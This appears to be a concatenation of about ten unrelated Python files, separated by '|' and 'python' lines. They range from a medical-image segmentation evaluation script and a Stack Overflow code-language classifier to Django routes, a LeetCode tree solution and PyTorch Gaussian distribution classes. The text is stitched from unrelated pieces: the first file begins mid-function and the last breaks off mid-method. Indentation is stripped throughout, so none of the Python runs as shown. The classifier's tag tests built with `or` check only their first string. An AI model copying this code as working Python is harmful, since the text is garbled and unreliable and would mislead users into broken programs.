val_seg_pred_au = np.concatenate(val_seg_pred_au, axis=0)
val_seg_probs_au = np.concatenate(val_seg_probs_au, axis=0)
# seg2cls
save_cf_png_dir_au = os.path.join(opt.logs, "cf", "eval_seg_au_cf.png")
save_metric_dir_au = os.path.join(opt.logs, "eval_metric_seg_au.txt")
result_str_au = get_results(val_gt, val_seg_pred_au, val_seg_probs_au, save_cf_png_dir_au, save_metric_dir_au)
logger.info("tgt_seg_au_val:[seg2cls]: %s" % (result_str_au))
time_elapsed = time.time() - since
logger.info("Eval complete in {:.0f}m {:.0f}s".format(time_elapsed // 60, time_elapsed % 60))
def extra_eval_model(model, dataloaders, log_dir="./log/", logger=None, opt=None):
since = time.time()
if True:
# eval infection segmentation and cls
logger.info("-"*8+"extra eval infection cls"+"-"*8)
model.eval()
val_gt = []
val_cls_pred = []
val_cls_probs = [] # for VOC
val_seg_pred = []
val_seg_probs = [] # for VOC
val_seg_probs_au = []
val_seg_pred_au = [] # for VOC
annotations = dataloaders["tgt_cls_extra_val"].dataset.annotations
for batch_idx, (inputs, labels) in enumerate(dataloaders["tgt_cls_extra_val"], 0):
inputs = inputs.to(device)
# adjust label
val_gt.append(labels.cpu().data.numpy())
with torch.set_grad_enabled(False):
annotation = annotations[batch_idx]
img_dir = annotation.strip().split(',')[0]
img_name = Path(img_dir).name
print(batch_idx, len(annotations))
if opt.use_aux:
cls_logits, _, seg_logits, _, seg_logits_au = model(inputs)
else:
cls_logits, _, seg_logits, _, _ = model(inputs)
if opt.do_seg:
seg_probs = torch.softmax(seg_logits, dim=1)
val_seg_probs.append(seg_probs[:,-1:].detach().cpu().view(seg_probs.shape[0], 1, -1).max(-1)[0])
predicted_mask_onehot = probs2one_hot(seg_probs.detach())
# for save
predicted_mask = predicted_mask_onehot.squeeze().cpu().numpy() # 3xwxh
mask_inone = (np.zeros_like(predicted_mask[0])+predicted_mask[1]*128+predicted_mask[2]*255).astype(np.uint8)
# save dir:
save_dir = os.path.join(opt.logs, "tgt_cls_extra_val", "eval")
#
if not os.path.exists(save_dir):
os.makedirs(save_dir)
cv2.imwrite(os.path.join(save_dir, img_name), mask_inone)
# seg2cls
preds_cls_seg = (predicted_mask_onehot[:,-1:].sum(-1).sum(-1) > 0).cpu().numpy().astype(np.uint8)
val_seg_pred.append(preds_cls_seg)
if opt.do_seg and opt.use_aux:
seg_probs_au = torch.softmax(seg_logits_au, dim=1)
val_seg_probs_au.append(seg_probs_au[:,-1:].detach().cpu().view(seg_probs_au.shape[0], 1, -1).max(-1)[0])
predicted_mask_onehot_au = probs2one_hot(seg_probs_au.detach())
# for save
predicted_mask_au = predicted_mask_onehot_au.squeeze().cpu().numpy() # 3xwxh
mask_inone_au = (np.zeros_like(predicted_mask_au[0])+predicted_mask_au[1]*128+predicted_mask_au[2]*255).astype(np.uint8)
# save dir:
save_dir_au = os.path.join(opt.logs, "tgt_cls_extra_val_au", "eval")
#
if not os.path.exists(save_dir_au):
os.makedirs(save_dir_au)
cv2.imwrite(os.path.join(save_dir_au, img_name), mask_inone_au)
# seg2cls
preds_cls_seg_au = (predicted_mask_onehot_au[:,-1:].sum(-1).sum(-1) > 0).cpu().numpy().astype(np.uint8)
val_seg_pred_au.append(preds_cls_seg_au)
# cls
#print(cls_logits)
if opt.do_cls:
probs_cls = torch.softmax(cls_logits, dim=1)
val_cls_probs.append(probs_cls[...,1:].detach().cpu().numpy())
preds_cls = (probs_cls[...,1:] > 0.5).type(torch.long)
val_cls_pred.append(preds_cls.cpu().data.numpy())
if not os.path.exists(os.path.join(opt.logs, "cf")):
os.makedirs(os.path.join(opt.logs, "cf"))
val_gt = np.concatenate(val_gt, axis=0)
if opt.do_cls:
val_cls_pred = np.concatenate(val_cls_pred, axis=0)
val_cls_probs = np.concatenate(val_cls_probs, axis=0)
save_cf_png_dir = os.path.join(opt.logs, "cf", "extra_eval_cls_cf.png")
save_metric_dir = os.path.join(opt.logs, "extra_eval_metric_cls.txt")
result_str = get_results(val_gt, val_cls_pred, val_cls_probs, save_cf_png_dir, save_metric_dir)
logger.info("tgt_cls_extra_val:[cls]: %s" % (result_str))
if opt.do_seg:
val_seg_pred = np.concatenate(val_seg_pred, axis=0)
val_seg_probs = np.concatenate(val_seg_probs, axis=0)
# seg2cls
save_cf_png_dir = os.path.join(opt.logs, "cf", "extra_eval_seg_cf.png")
save_metric_dir = os.path.join(opt.logs, "extra_eval_metric_seg.txt")
result_str = get_results(val_gt, val_seg_pred, val_seg_probs, save_cf_png_dir, save_metric_dir)
logger.info("tgt_seg_extra_val:[seg2cls]: %s" % (result_str))
if opt.do_seg and opt.use_aux:
val_seg_pred_au = np.concatenate(val_seg_pred_au, axis=0)
val_seg_probs_au = np.concatenate(val_seg_probs_au, axis=0)
# seg2cls
save_cf_png_dir_au = os.path.join(opt.logs, "cf", "extra_eval_seg_au_cf.png")
save_metric_dir_au = os.path.join(opt.logs, "extra_eval_metric_seg_au.txt")
result_str_au = get_results(val_gt, val_seg_pred_au, val_seg_probs_au, save_cf_png_dir_au, save_metric_dir_au)
logger.info("tgt_seg_au_extra_val:[seg2cls]: %s" % (result_str_au))
time_elapsed = time.time() - since
logger.info("Extra_Eval complete in {:.0f}m {:.0f}s".format(time_elapsed // 60, time_elapsed % 60))
def get_argument():
parser = argparse.ArgumentParser()
parser.add_argument('--config', default="./cfgs/experiment.yaml", type=str)
#parser.add_argument('--setseed', default=2020, type=int)
parser.add_argument('--fold', default=0, type=int)
parser.add_argument('--setgpuid', default=0, type=int)
opt = parser.parse_args()
with open(opt.config) as f:
config = yaml.load(f)
for k, v in config['common'].items():
setattr(opt, k, v)
# repalce experiment
opt.experiment = opt.experiment.replace("only", "mmd")
opt.seg_augment = True
opt.cls_augment = True
opt.do_cls_mmd = True
opt.do_seg = True
opt.do_cls = True
opt.do_seg_mmd = False
opt.eval_cls_times = 50
opt.eval_times = 50
# opt.random_seed = opt.setseed
opt.random_seed = 1010 * (opt.fold + 1)
opt.gpuid = opt.setgpuid
selected_drr_datasets_indexes = np.array(opt.selected_drr_datasets_indexes+opt.selected_drr_datasets_indexes)
#print(selected_drr_datasets_indexes)
# # [[0, 0, 0], [1, 0, 0], [0, 0, 1], [1, 0, 1]]
print(selected_drr_datasets_indexes[-1][-1])
selected_drr_datasets_indexes[2][-1] = 1
selected_drr_datasets_indexes[3][-1] = 1
opt.selected_drr_datasets_indexes = [list(_) for _ in list(selected_drr_datasets_indexes)]
log_dir = "./{}/{}/{}".format("logs_bk", opt.experiment, "fold%d"%opt.fold)
if not os.path.exists(log_dir):
os.makedirs(log_dir)
opt.logs = log_dir
return opt
if __name__ == "__main__":
opt = get_argument()
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"] = "{}".format(opt.gpuid)
setup_seed(opt.random_seed)
assert opt.mode == 12, ("opt.mode is not supported in %s" % __file__)
log_dir = opt.logs
logger = setup_logger("{}".format(os.path.basename(__file__).split(".")[0]),
save_dir=opt.logs, distributed_rank=0, filename="log_eval.txt")
logger.info(opt)
batch_size = opt.batch_size
num_epochs = opt.num_epochs
use_pretrained = True
device_name = "cuda" if torch.cuda.is_available() else "cpu"
device = torch.device(device_name)
model_ft = SegClsModule(opt)
train_dataset, tgt_cls_train_dataset, tgt_cls_val_dataset, tgt_lung_seg_val_dataset = genDataset(opt)
tgt_cls_extra_val_dataset = genExtraForEvalDataset(opt)
logger.info("-"*8+"train:"+"-"*8)
logger.info(train_dataset.annotations)
logger.info("-"*8+"tgt_cls_train:"+"-"*8)
logger.info(tgt_cls_train_dataset.annotations)
logger.info("-"*8+"tgt_cls_val:"+"-"*8)
logger.info(tgt_cls_val_dataset.annotations)
logger.info("-"*8+"tgt_cls_extra_val:"+"-"*8)
logger.info(tgt_cls_extra_val_dataset.annotations)
# logger.info("-"*8+"tgt_lung_seg_val:"+"-"*8)
# logger.info(tgt_lung_seg_val_dataset.annotations)
image_datasets = {'train': train_dataset, 'tgt_cls_train': tgt_cls_train_dataset, 'tgt_cls_val': tgt_cls_val_dataset, 'tgt_cls_extra_val': tgt_cls_extra_val_dataset, "tgt_lung_seg_val": tgt_lung_seg_val_dataset}
shuffles = {"train": True,'tgt_cls_train': True, 'tgt_cls_val': False, 'tgt_cls_extra_val': False, "tgt_lung_seg_val": False}
batch_sizes_dict = {"train": batch_size,'tgt_cls_train': batch_size, 'tgt_cls_val': 1, 'tgt_cls_extra_val': 1, "tgt_lung_seg_val": 1}
drop_lasts = {"train": True,'tgt_cls_train': True, 'tgt_cls_val': False, 'tgt_cls_extra_val': False, "tgt_lung_seg_val": False}
number_worker_dict = {"train": 4,'tgt_cls_train': 4, 'tgt_cls_val': 0, 'tgt_cls_extra_val': 0, "tgt_lung_seg_val": 0}
dataloaders_dict = {x: torch.utils.data.DataLoader(image_datasets[x], batch_size=batch_sizes_dict[x], shuffle=shuffles[x], num_workers=number_worker_dict[x], drop_last=drop_lasts[x]) for x in ['train', 'tgt_cls_train', 'tgt_cls_val', 'tgt_cls_extra_val', "tgt_lung_seg_val"]}
# Send the model to GPU
weight_path = os.path.join(log_dir, "latest.pth")
model_ft.load_state_dict(torch.load(weight_path))
model_ft = model_ft.to(device)
model_ft.eval()
#eval_model(model_ft, dataloaders_dict, log_dir=log_dir, logger=logger, opt=opt)
extra_eval_model(model_ft, dataloaders_dict, log_dir=log_dir, logger=logger, opt=opt)
|
python
|
# Author: Andrew Sainz
#
# Purpose: XMLAnalyze is designed to iterate through a collection of Post data collected from Stack Overflow
# forums. Data collected to analyze the code tagged information to find the language of the code
# being utilized.
#
# How to use: To run from command line input "python XMLAnalyze.py Posts.xml"
import sys
import re
import os
import nltk
import operator
from random import randint
from nltk.util import ngrams
from ngramFunctions import *
from XMLParser import *
from frequencyFunctions import *
from lxml import etree
def features(sentence):
words = sentence.lower().split()
return dict(('contains(%s)' %w, True) for w in words)
if __name__ == '__main__':
xmldoc = sys.argv[1]
knownJava = sys.argv[2]
knownCpp = sys.argv[3]
###################################################################
# Section 1: Gather known data to create frequencies for known information
###################################################################
knownJavaFile = open(knownJava)
knownJavaString = ""
for line in knownJavaFile:
knownJavaString += line
# knownJavaGram = ngramsFunction(knownJavaString, 3)
knownJavaGram = ngrams(knownJavaString.split(' '),3)#ngramsFunction(knownJavaString, 3)
knownJavaHashFreq = nltk.FreqDist(knownJavaGram)
# javaMaxGram = max(knownJavaHashFreq, key=knownJavaHashFreq.get)
# print(javaMaxGram, knownJavaHashFreq[javaMaxGram])
knownCPPFile = open(knownCpp)
knownCPPString = ""
for line in knownCPPFile:
knownCPPString += line
# print(knownCPPString)
knownCPPGram = ngrams(knownCPPString.split(' '),3)
knownCPPHashFreq = nltk.FreqDist(knownCPPGram)
# cppMaxGram = max(knownCPPHashFreq, key=knownCPPHashFreq.get)
# print(cppMaxGram, knownCPPHashFreq[cppMaxGram])
#############################################################################################
# Section 2: to calculate trigram Probability
#############################################################################################
kneserJava = nltk.KneserNeyProbDist(knownJavaHashFreq)
kneserCPP = nltk.KneserNeyProbDist(knownCPPHashFreq)
kneserJavaHash = convertProbListToHash(kneserJava)
kneserCPPHash = convertProbListToHash(kneserCPP)
cpp = 0
java = 0
totalCppWithTag = 0
totalJavaWithTag = 0
totalJavaTags = 0
totalCppTags = 0
totalEval = 0
resultsFile = open('Results.txt', 'a')
codeFile = open('Code.txt', 'a')
analyticsFile = open('Analytics.txt', 'a')
resultsFileString = codeFileString = analyticsString = ''
presencePosCpp = presenceNegCpp = absencePosCpp = absenceNegCpp =0
presencePosJava = presenceNegJava = absencePosJava = absenceNegJava = 0
# tree = ET.parse(xmldoc)
# root = tree.getroot()
for event, element in etree.iterparse(xmldoc, tag="row"):
body = element.get('Body')
# Only allow posts with a code tag to be added
if '<code>' in body:
postId = element.get('Id')
# Tags for comment post
tags = element.get('Tags')
if tags == None:
continue
tags.lower()
# if not ('<java>' or 'c++' or '<c>' or '<c++-faq>' or '<android>' or '<spring>' or '<swing>' or '<pass-by-reference>' or '<eclipse>' or '<regex>' or '<recursion>' or '<binary-tree>' or '<software-engineering>' or '<divide-by-zero>' or '<arraylist>' or '<garbage-collection>' or '<object>' or '<arrays>' or '<iterator>' or '<hashcode>' or '<inheritance>' or '<tostring>' or '<unicode>' or '<quicksort>' or '<sorting>' or '<jar>' or '<bubble-sort>' or '<hashcode>' or '<multidimensional-array>' or '<codebase>' or '<class>') in tags:
# continue
# Skip if post contains tags from multiple languauges
# if (('<c++>' or '<c++-faq>' or '<c>' in tags) and ('<java>' or '<android>' or '<spring>' or '<swing>' in tags)) :
# continue
code = parseBodyForTagCode(body)
codeString = ''
for item in code:
snipetLength = len(item.split())
if snipetLength > 5:
codeString = codeString+re.sub('<code>|</code>',' ',item)
codeString = re.sub('\n|\r|/\s\s+/g}',' ',codeString)
codeString = re.sub('\.', ' ', codeString)
codeString = re.sub('\t', '',codeString)
codeString = re.sub(re.compile("/\*.*?\*/",re.DOTALL ) ,"" ,codeString)
codeString = re.sub(re.compile("//.*?\n" ) ,"" ,codeString)
codeString = re.sub( '[^0-9a-zA-Z]+', ' ', codeString )
codeString = re.sub( '\s+', ' ', codeString).strip()
codeFileString = codeFileString+codeString
codeLength = len(codeString.split())
# print(codeLength)
if(codeLength < 3):
continue
totalEval += 1# total posts not skipped
# In some cases a post can include tags associated with more than one languauge
if ('c++' or '<c++-faq>' or '<c>') in tags:
totalCppTags += 1
if ('<java>' or '<android>' or '<spring>' or '<swing>') in tags:
totalJavaTags += 1
# print(codeString)
codeList = ngrams(codeString.split(' '),5)
codeGram = nltk.FreqDist(codeList)
for gram in codeGram:
cppValue = kneserCPPHash.get(str(gram))
javaValue = kneserJavaHash.get(str(gram))
if cppValue != None and javaValue != None:
# Compare to the frequency values
if cppValue > javaValue:
cpp += 1
else:
java += 1
# if there is a hit for either one then add to hit value
elif cppValue == None and javaValue != None:
java += 1
elif cppValue != None and javaValue == None:
cpp += 1
# if hit values are the same make a guess on language
if java == cpp:
ran = randint(0,1)
if(ran == 0):
java += 1
else:
cpp += 1
# Done looking for gram hit values
#################################
# fix absence
#################################
# if java == 0 and ('<java>' or '<android>' or '<spring>' or '<swing>') in tags:
# absenceNegJava += 1
# if cpp == 0 and ('c++' or '<c++-faq>' or '<c>') in tags:
# absenceNegCpp += 1
# if java > cpp and not ('java' or '<android>' or '<spring>' or '<swing>') in tags:
# print('absence is true')
# absencePosJava += 1
# if cpp > java and not ('c++' or '<c++-faq>' or '<c>') in tags:
# absencePosCpp += 1
#################################
# if no values where hit then move on to next post row
# if java == 0 and cpp == 0:
# continue
determinedCpp = determinedJava = False
resultsFileString = resultsFileString+'Grams assigned as followed:\n'
resultsFileString = resultsFileString+'PostId: {}\nC++: {} Java: {}\nCode: {} \n'.format(postId,cpp,java,codeString)
if cpp > java:
resultsFileString = resultsFileString+'Snippet determined to be C++\nTags include {}\n\n'.format(tags)
determinedCpp = True
# if ('c++' or '<c++-faq>' or '<c>') in tags:
# totalCppWithTag += 1
elif java > cpp:
resultsFileString = resultsFileString+'Snippet determined to be Java\nTags include {}\n\n'.format(tags)
determinedJava = True
# if ('<java>' or '<android>' or '<spring>' or '<swing>') in tags:
# totalJavaWithTag += 1
# analyze results
if determinedCpp == True and ('c++' or '<c++-faq>' or '<c>') in tags:
presencePosCpp += 1
if determinedCpp == False and ('c++' or '<c++-faq>' or '<c>') in tags:
presenceNegCpp += 1
if determinedCpp == True and not('c++' or '<c++-faq>' or '<c>') in tags:
absencePosCpp += 1
if determinedCpp == False and not('c++' or '<c++-faq>' or '<c>') in tags:
absenceNegCpp += 1
if determinedJava == True and ('<java>' or '<android>' or '<spring>' or '<swing>') in tags:
presencePosJava += 1
if determinedJava == False and ('<java>' or '<android>' or '<spring>' or '<swing>') in tags:
presenceNegJava += 1
if determinedJava == True and not('<java>' or '<android>' or '<spring>' or '<swing>') in tags:
absencePosJava += 1
if determinedJava == False and not('<java>' or '<android>' or '<spring>' or '<swing>') in tags:
absenceNegJava += 1
# if ('c++' or '<c++-faq>' or '<c>') in tags:
# # presence is true
# if cpp > java:
# # positive is true
# # true positive
# presencePosCpp += 1
# else:
# # false negative
# presenceNegCpp += 1
# # elif cpp > java:
# # # been determined cpp but no cpp tags
# # # incorectly determined
# # # false positive
# # absencePosCpp += 1
# # else:
# # # determined not to be cpp correctly
# # # true negative
# # absenceNegCpp += 1
# if ('<java>' or '<android>' or '<spring>' or '<swing>') in tags:
# # presence is true
# if java > cpp:
# presencePosJava += 1
# else:
# presenceNegJava += 1
# # elif java > cpp:
# absencePosJava += 1
# else:
# absenceNegJava += 1
java = 0
cpp = 0
element.clear()
for ancestor in element.xpath('ancestor-or-self::*'):
while ancestor.getprevious() is not None:
del ancestor.getparent()[0]
javaSensitivity = presencePosJava / (presencePosJava+presenceNegJava)
javaSpecificity = absenceNegJava / (absenceNegJava+absencePosJava)
javaRateFalsePos = absencePosJava / (absencePosJava+absenceNegJava)
javaRateFalseNeg = presenceNegJava / (presenceNegJava+presencePosJava)
javaPosPredict = presencePosJava / (presencePosJava+ absencePosJava)
javaNegPredict = presenceNegJava / (presenceNegJava+ absenceNegJava)
javaRelativeRisk = (presencePosJava/ (presencePosJava + presenceNegJava)) / (absencePosJava / (absencePosJava + absenceNegJava))
cppSensitivity = presencePosCpp / (presencePosCpp+presenceNegCpp)
cppSpecificity = absenceNegCpp / (absenceNegCpp+absencePosCpp)
cppRateFalsePos = absencePosCpp / (absencePosCpp+absenceNegCpp)
cppRateFalseNeg = presenceNegCpp / (presenceNegCpp+presencePosCpp)
cppPosPredict = presencePosCpp / (presencePosCpp+ absencePosCpp)
cppNegPredict = presenceNegCpp / (presenceNegCpp+absenceNegCpp)
cppRelativeRisk = (presencePosCpp/ (presencePosCpp + presenceNegCpp)) / (absencePosCpp / (absencePosCpp + absenceNegCpp))
analyticsString = 'Java\n------\nTrue Positive: {}\nFalse Negative: {}\nFalse Positive: {}\nTrue Negative: {}'.format(presencePosJava,presenceNegJava,absencePosJava,absenceNegJava)
analyticsString += '\nSensitivity: {}\nSpecificity: {}'.format(javaSensitivity, javaSpecificity)
analyticsString += '\nRate False Positives: {}\nRate False Negatives: {}'.format(javaRateFalsePos, javaRateFalseNeg)
analyticsString += '\nEstimate Positive Predictive Value: {}\nEstimate Negative Predictive Value: {}'.format(javaPosPredict, javaNegPredict)
analyticsString += '\nRelative Risk: {}'.format(javaRelativeRisk)
analyticsString += '\n\nC++\n------\nTrue Positive: {}\nFalse Negative: {}\nFalse Positive: {}\nTrue Negative: {}'.format(presencePosCpp,presenceNegCpp,absencePosCpp,absenceNegCpp)
analyticsString += '\nSensitivity: {}\nSpecificity: {}'.format(cppSensitivity, cppSpecificity)
analyticsString += '\nRate False Positives: {}\nRate False Negatives: {}'.format(cppRateFalsePos, cppRateFalseNeg)
analyticsString += '\nEstimate Positive Predictive Value: {}\nEstimate Negative Predictive Value: {}'.format(cppPosPredict, cppNegPredict)
analyticsString += '\nRelative Risk: {}'.format(cppRelativeRisk)
#############################################################################################
# Section Output
#############################################################################################
resultsFile.write(resultsFileString)
codeFile.write(codeFileString)
analyticsFile.write(analyticsString)
# print('Total Java snippets determined and also have tags (java, android, spring, swing): {}'.format(totalJavaWithTag))
# print('Total Java snippets: {}'.format(totalJavaTags))
# print('Total C++ snippets determined and also have tags (c++, c++-faq, c): {}'.format(totalCppWithTag))
# print('Total C++ snippets: {}'.format(totalCppTags))
# print('Total snippets evaluated: {}'.format(totalEval))
|
python
|
from .bindings import so, FPDF_PATH_POINT, FPDF_RECT
from ctypes import pointer
class Glyph:
'''Represents Glyph drawing instructions'''
LINETO = 0 #: LineTo instruction
CURVETO = 1 #: CurveTo instruction
MOVETO = 2 #: MoveTo instruction
def __init__(self, glyph, parent):
self._glyph = glyph
self._parent = parent
self._bounds = None
def __len__(self):
return so.REDGlyph_Size(self._glyph)
def __iter__(self):
for i in range(len(self)):
yield self[i]
def __getitem__(self, i):
'''Returns a 4-tuple representing this drawing instruction: (x, y, type, close).
Args:
i (int): index of the instruction
'''
point = FPDF_PATH_POINT()
so.REDGlyph_Get(self._glyph, i, pointer(point))
return point.x, point.y, point.type, point.close
# @memoize
# def _bounds(self):
# if len(self) == 0:
# return None
# coords = [(x, y) for x, y, _, _ in self]
# xmin = min(x for x,_ in coords)
# xmax = max(x for x,_ in coords)
# ymin = min(y for _,y in coords)
# ymax = max(y for _,y in coords)
# return xmin, ymin, xmax, ymax
def bounds(self):
if self._bounds is None:
rect = FPDF_RECT(0., 0., 0., 0.)
so.REDGlyph_GetBounds(self._glyph, pointer(rect))
self._bounds = rect.left, rect.bottom, rect.right, rect.top
return self._bounds
@property
def ascent(self):
bounds = self.bounds()
return max(0, bounds[3])
@property
def descent(self):
_, ymin, _, _ = self.bounds()
return max(0, -ymin)
@property
def advance(self):
_, _, xmax, _ = self.bounds()
return max(0, xmax)
|
python
|
n = int(raw_input())
comportadas = 0
children = []
for i in range(n):
ent = map(str, raw_input().split())
children.append(ent[1])
if ent[0] == "+":
comportadas += 1
children.sort()
for child in children:
print child
print "Se comportaram: %d | Nao se comportaram: %d" % (comportadas, n - comportadas)
|
python
|
import sys
from mpc_func import *
try:
poses = load_poses(sys.argv[1])
except:
print('Please use the right .csv file!')
sparseness = 100
sparse_poses = poses[1::sparseness, 1:3]
path = [148, 150, 151, 153, 154, 156, 158, 160, 162, 163]
dt = 1 # [s] discrete time
lr = 1.0 # [m]
T = 6 # number of horizon
max_speed = 5
min_speed = -5
speed_now = 1
theta = -1.5
path_poses = sparse_poses[path[:T+1], :]
u, next_x, xstar, ustar = path_poses_to_input(path_poses, speed_now, theta,
dt, lr, T, max_speed, min_speed)
# plot the result
plt.figure(figsize=(10,10))
plt.subplot(3, 1, 1)
plt.plot(path_poses[0][0], path_poses[0][1], 'xb', label='current pose')
plt.plot(next_x[0], next_x[1], 'xr', label='next pose given current control output')
plt.plot(GetListFromMatrix(xstar.value[0, :]), GetListFromMatrix(
xstar.value[1, :]), '-.', label='estimated trajectory given control outputs')
plt.plot(path_poses[:T,0], path_poses[:T,1], label='reference trajectory')
plt.axis("equal")
plt.xlabel("x[m]")
plt.ylabel("y[m]")
plt.legend()
plt.grid(True)
plt.subplot(3, 1, 2)
plt.cla()
plt.plot(GetListFromMatrix(xstar.value[2, :]), '-b',label='linear velocity')
plt.plot(GetListFromMatrix(xstar.value[3, :]), '-r',label='pose angle')
#plt.ylim([-1.0, 1.0])
plt.ylabel("velocity[m/s]")
plt.xlabel("horizon")
plt.legend()
plt.grid(True)
plt.subplot(3, 1, 3)
plt.cla()
plt.plot(GetListFromMatrix(ustar.value[0, :]), '-r', label="acceleration")
plt.plot(GetListFromMatrix(ustar.value[1, :]), '-b', label="beta")
#plt.ylim([-0.5, 0.5])
plt.legend()
plt.grid(True)
plt.show()
|
python
|
from django.urls import path, include
from . import views
urlpatterns = [
path('', views.index, name = 'index'),
path('home/',views.home,name = 'home'),
path('maps/',views.maps, name = 'maps'),
path('maps/3dmap',views.mapsd, name = 'mapsd'),
path('accounts/login/', views.loginpage , name = 'loginpage'),
path('login/validate', views.loginvalidate , name = 'loginvalidate'),
path('sponsors/', views.sponsors , name = 'sponsors'),
path('team/', views.team , name = 'team'),
path('gallery/', views.gallery, name = 'gallery'),
path('social/', views.social, name = 'social'),
path('events/', views.events , name = 'events'),
path('signup/', views.signup , name = 'signup'),
]
|
python
|
import os
import sys
import unittest
if __name__ == "__main__":
# add the path to be execute in the main directory
sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.realpath(__file__))))
testmodules = [
'tests.test_nsga2',
#'pymoo.usage.test_usage'
]
suite = unittest.TestSuite()
for t in testmodules:
suite.addTest(unittest.defaultTestLoader.loadTestsFromName(t))
unittest.TextTestRunner().run(suite)
|
python
|
import logging
import os
from peek_plugin_base.PeekVortexUtil import peekStorageName
logger = logging.getLogger(__name__)
class StorageTestMixin:
def __init__(self):
self._dbConn = None
def setUp(self) -> None:
from peek_storage._private.storage import setupDbConn
from peek_storage._private.storage.DeclarativeBase import metadata
import peek_storage
from peek_plugin_base.storage.DbConnection import DbConnection
from peek_storage._private.service.PeekStorageConfig import PeekStorageConfig
from peek_platform import PeekPlatformConfig
PeekPlatformConfig.componentName = peekStorageName
config = PeekStorageConfig()
alembicDir = os.path.join(
os.path.dirname(peek_storage._private.__file__),
"alembic")
self._dbConn = DbConnection(dbConnectString=config.dbConnectString,
metadata=metadata,
alembicDir=alembicDir,
dbEngineArgs=config.dbEngineArgs,
enableCreateAll=False,
enableForeignKeys=False)
self._dbConn.migrate()
def tearDown(self) -> None:
self._dbConn.closeAllSessions()
|
python
|
# -*- coding: utf-8 -*-
"""
654. Maximum Binary Tree
Given an integer array with no duplicates. A maximum tree building on this array is defined as follow:
The root is the maximum number in the array.
The left subtree is the maximum tree constructed from left part subarray divided by the maximum number.
The right subtree is the maximum tree constructed from right part subarray divided by the maximum number.
Construct the maximum tree by the given array and output the root node of this tree.
"""
# Definition for a binary tree node.
class TreeNode:
def __init__(self, val=0, left=None, right=None):
self.val = val
self.left = left
self.right = right
class Solution:
def constructMaximumBinaryTree(self, nums) -> TreeNode:
if not nums:
return None
max_val = nums[0]
max_ind = 0
for ind, val in enumerate(nums):
if val > max_val:
max_ind = ind
max_val = val
l_node = self.constructMaximumBinaryTree(nums[:max_ind])
r_node = self.constructMaximumBinaryTree(nums[max_ind + 1:])
root = TreeNode(val=max_val, left=l_node, right=r_node)
return root
|
python
|
import torch
import math
import numpy as np
from torch.distributions.multivariate_normal import MultivariateNormal
from spirl.utils.pytorch_utils import ten2ar
from spirl.utils.general_utils import batch_apply
class Gaussian:
""" Represents a gaussian distribution """
# TODO: implement a dict conversion function
def __init__(self, mu, log_sigma=None):
"""
:param mu:
:param log_sigma: If none, mu is divided into two chunks, mu and log_sigma
"""
if log_sigma is None:
if not isinstance(mu, torch.Tensor):
import pdb; pdb.set_trace()
mu, log_sigma = torch.chunk(mu, 2, -1)
self.mu = mu
self.log_sigma = torch.clamp(log_sigma, min=-10, max=2) if isinstance(log_sigma, torch.Tensor) else \
np.clip(log_sigma, a_min=-10, a_max=2)
self._sigma = None
def sample(self):
return self.mu + self.sigma * torch.randn_like(self.sigma)
def kl_divergence(self, other):
"""Here self=q and other=p and we compute KL(q, p)"""
return (other.log_sigma - self.log_sigma) + (self.sigma ** 2 + (self.mu - other.mu) ** 2) \
/ (2 * other.sigma ** 2) - 0.5
def nll(self, x):
# Negative log likelihood (probability)
return -1 * self.log_prob(x)
def log_prob(self, val):
"""Computes the log-probability of a value under the Gaussian distribution."""
return -1 * ((val - self.mu) ** 2) / (2 * self.sigma**2) - self.log_sigma - math.log(math.sqrt(2*math.pi))
def entropy(self):
return 0.5 + 0.5 * math.log(2 * math.pi) + torch.log(self.sigma)
@property
def sigma(self):
if self._sigma is None:
self._sigma = self.log_sigma.exp()
return self._sigma
@property
def shape(self):
return self.mu.shape
@staticmethod
def stack(*argv, dim):
return Gaussian._combine(torch.stack, *argv, dim=dim)
@staticmethod
def cat(*argv, dim):
return Gaussian._combine(torch.cat, *argv, dim=dim)
@staticmethod
def _combine(fcn, *argv, dim):
mu, log_sigma = [], []
for g in argv:
mu.append(g.mu)
log_sigma.append(g.log_sigma)
mu = fcn(mu, dim)
log_sigma = fcn(log_sigma, dim)
return Gaussian(mu, log_sigma)
def average(self, dists):
"""Fits single Gaussian to a list of Gaussians."""
mu_avg = torch.stack([d.mu for d in dists]).sum(0) / len(dists)
sigma_avg = torch.stack([d.mu ** 2 + d.sigma ** 2 for d in dists]).sum(0) - mu_avg**2
return type(self)(mu_avg, torch.log(sigma_avg))
def chunk(self, *args, **kwargs):
return [type(self)(chunk) for chunk in torch.chunk(self.tensor(), *args, **kwargs)]
def view(self, shape):
self.mu = self.mu.view(shape)
self.log_sigma = self.log_sigma.view(shape)
self._sigma = self.sigma.view(shape)
return self
def __getitem__(self, item):
return Gaussian(self.mu[item], self.log_sigma[item])
def tensor(self):
return torch.cat([self.mu, self.log_sigma], dim=-1)
def rsample(self):
"""Identical to self.sample(), to conform with pytorch naming scheme."""
return self.sample()
def detach(self):
"""Detaches internal variables. Returns detached Gaussian."""
return type(self)(self.mu.detach(), self.log_sigma.detach())
def to_numpy(self):
"""Convert internal variables to numpy arrays."""
return type(self)(ten2ar(self.mu), ten2ar(self.log_sigma))
class UnitGaussian(Gaussian):
def __init__(self, size, device):
mu = torch.zeros(size, device=device)
log_sigma = torch.zeros(size, device=device)
super().__init__(mu, log_sigma)
class MultivariateGaussian(Gaussian):
def log_prob(self, val):
return super().log_prob(val).sum(-1)
@staticmethod
def stack(*argv, dim):
return MultivariateGaussian(Gaussian.stack(*argv, dim=dim).tensor())
@staticmethod
def cat(*argv, dim):
return MultivariateGaussian(Gaussian.cat(*argv, dim=dim).tensor())
class MultivariateDiagNormal(MultivariateNormal):
def __init__(self, loc, scale, *args, **kwargs):
cov = torch.diag_embed(scale.pow(2))
super().__init__(loc, cov, *args, **kwargs)
class SequentialGaussian_SharedPQ:
""" stacks two Gaussians """
def __init__(self, g1, z1, g2):
"""
"""
self.g1 = g1
self.g2 = g2
self.z1 = z1
assert z1.shape == g1.shape
self.shared_dims = None # how many shape dimensions are shared
self._update_shared_dims()
def sample(self):
"""
sample z2 and concatentate with z1
:return:
"""
return torch.cat([self.z1, self.g2.sample()], dim=1)
def kl_divergence(self, other):
return self.g1.kl_divergence(other.g1)
@property
def shape(self):
self._update_shared_dims()
return self.g1.shape[:self.shared_dims]
@property
def mu(self):
return self.g1.mu
@staticmethod
def stack(*argv, dim):
return SequentialGaussian_SharedPQ._combine(torch.stack, *argv, dim=dim)
@staticmethod
def cat(*argv, dim):
